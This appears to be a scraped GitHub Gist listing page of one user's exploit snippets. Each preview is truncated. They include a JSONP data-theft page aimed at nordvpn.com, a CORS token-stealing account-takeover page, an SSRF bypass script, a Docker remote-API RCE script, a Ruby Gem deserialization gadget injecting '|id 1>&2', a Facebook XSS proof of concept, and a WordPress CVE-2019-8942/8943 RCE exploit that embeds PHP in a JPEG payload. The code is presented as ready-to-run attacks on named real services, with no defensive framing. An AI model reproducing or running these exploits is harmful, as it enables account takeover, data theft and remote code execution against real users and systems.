mickeybrew andripwn
@andripwn
andripwn / json-exploit.html
Created February 8, 2020 17:12
Steal Customer Sensitive Information - With alert Json API
<script>
function rip(a) {
alert(JSON.stringify(a[1]));
}
</script>
<script src="https://join.nordvpn.com/api/v1/users?callback=rip"></script>
@andripwn
andripwn / CVE-2018-6389.sh
Created February 8, 2020 20:47
CVE-2018-6389 Service Attack
#!/bin/bash
#This colour
cyan='\e[0;36m'
green='\e[0;34m'
okegreen='\033[92m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
BlueF='\e[1;34m'
@andripwn
andripwn / StealToken.html
Created February 19, 2020 20:33
Full Account Takeover through CORS with connection Sockets
<!DOCTYPE html>
<html>
<head><title>Exploiting CORS</title></head>
<body>
<center>
<h1>Getting your information through CORS</h1>
<button type="button" onclick="ProcessUrls()">Exploit</button>
</div>
<script type="text/javascript">
var cont = 0;
@andripwn
andripwn / pwn-urlatt-redir.py
Created February 20, 2020 13:07
SSRF - URL Attachments Bypass
import json
import requests
import sys
HOST = 'https://sandbox.open-xchange.com'
USERNAME = '[email protected]'
PASSWORD = 'secret'
PORTS = [22, 23, 443, 444]
#!/bin/bash
# colors
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[0;33m'
RESET='\033[0m'
# install homebrew
echo -e "[-] ${GREEN}install homebrew...${RESET}"
@andripwn
andripwn / docker.py
Created February 26, 2020 16:08
console-put-rce
from __future__ import print_function
import requests
import logging
import json
import urllib.parse
# NOTE
# Enable Remote API with the following command
# /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
# This is an intended feature, remember to filter the port 2375..
@andripwn
andripwn / crawler.py
Created February 27, 2020 17:03
Tesla Crawler
import argparse
import requests
import logging
import pandas as pd
import time
logging.basicConfig()
logger = logging.getLogger('tesla-crawler')
logger.setLevel(logging.INFO)
@andripwn
andripwn / OTP.rb
Last active March 5, 2020 17:55
Universal OTP
#!/usr/bin/env ruby
class Gem::StubSpecification
def initialize; end
end
stub_specification = Gem::StubSpecification.new
stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2")
@andripwn
andripwn / fb-xss-poc.html
Created March 12, 2020 17:03
iPhone app XSS in Facebook Mail
<script type="text/javascript" src="http://www.online24.nl/static/assets/js/jquery-1.4.4.min.js"></script>
<script type="text/javascript">
// http://iphone.facebook.com/photo_dashboard.php?endtime=1311780199&__ajax__&__metablock__=9
$(function(){
parse_messages = function()
{
$('.twoLines.preview>.snippet').each(function(index,value)
{
lines = value.innerHTML.replace(/(<([^>]+)>)/ig,'');
@andripwn
andripwn / wordpress-rce.js
Created March 16, 2020 15:53
WordPress <= 5.0 exploit code for CVE-2019-8942 & CVE-2019-8943
var wpnonce = '';
var ajaxnonce = '';
var wp_attached_file = '';
var imgurl = '';
var postajaxdata = '';
var post_id = 0;
var cmd = '<?php phpinfo();/*';
var cmdlen = cmd.length
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);